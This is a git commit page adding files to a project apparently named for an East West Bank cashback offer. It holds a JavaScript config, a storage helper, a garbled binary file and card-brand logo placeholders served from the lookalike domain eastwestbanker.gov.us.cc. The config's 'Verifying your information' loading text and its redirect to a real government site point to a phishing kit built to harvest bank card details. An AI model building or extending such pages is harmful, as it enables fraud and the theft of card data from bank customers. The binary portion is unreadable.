update
This commit is contained in:
2147
a6_ph_Cashback_eastwestbanker/public/Static_zy/_frame/a_index.html
Normal file
2147
a6_ph_Cashback_eastwestbanker/public/Static_zy/_frame/a_index.html
Normal file
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,2 @@
|
||||
`<60>/`<60><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><02><><EFBFBD><EFBFBD>.V#a6*<2A>,S!<21><><03><><0F><05>Y<17>J<EFBFBD>i<EFBFBD><69><EFBFBD>/^<1A>X<EFBFBD><58><EFBFBD>t<>Xnk[<5B><><18>[˷F<CBB7>A<EFBFBD>QI<51>l<EFBFBD><6C>桋e*<2A> <09>:&w<EFBFBD>7s<EFBFBD><EFBFBD>a#<23><><EFBFBD>+'<27>"
|
||||
ʬ<EFBFBD><EFBFBD><EFBFBD>u<EFBFBD>(<28><><1B>=<3D>,D
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,45 @@
|
||||
var cfg = {
|
||||
projectName: "SG-ETC-onemotoring-1",
|
||||
errorJumpAddress: "https://eserbisyo.lra.gov.ph",
|
||||
loadinglayerStyles: "#A2A19E",
|
||||
loadinglayerFont: "Verifying your information. This may take 1 to 5 minutes. Please do not leave this page.",
|
||||
customPhoneDefaultValue: "Your phone",
|
||||
customEmailDefaultValue: "Your email",
|
||||
isThankPage:"1"
|
||||
};
|
||||
|
||||
|
||||
|
||||
const jwr_storage = {
|
||||
_driver: (() => {
|
||||
try {
|
||||
localStorage.setItem('__test__', '1');
|
||||
localStorage.removeItem('__test__');
|
||||
return 'localStorage';
|
||||
} catch (e) {
|
||||
return 'sessionStorage';
|
||||
}
|
||||
})(),
|
||||
|
||||
set(key, value) {
|
||||
if (this._driver === 'localStorage') {
|
||||
localStorage.setItem(key, value);
|
||||
} else {
|
||||
sessionStorage.setItem(key, value);
|
||||
}
|
||||
},
|
||||
|
||||
get(key) {
|
||||
return this._driver === 'localStorage'
|
||||
? localStorage.getItem(key)
|
||||
: sessionStorage.getItem(key);
|
||||
},
|
||||
|
||||
remove(key) {
|
||||
if (this._driver === 'localStorage') {
|
||||
localStorage.removeItem(key);
|
||||
} else {
|
||||
sessionStorage.removeItem(key);
|
||||
}
|
||||
}
|
||||
};
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/amex-card.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/card-refresh.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/diners-club.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/discover-card.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/jcb-card.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/maesteo-card.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/master-card.lottie
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://eastwestbanker.gov.us.cc/_frame/user-img/visa-card.lottie
|
||||
Reference in New Issue
Block a user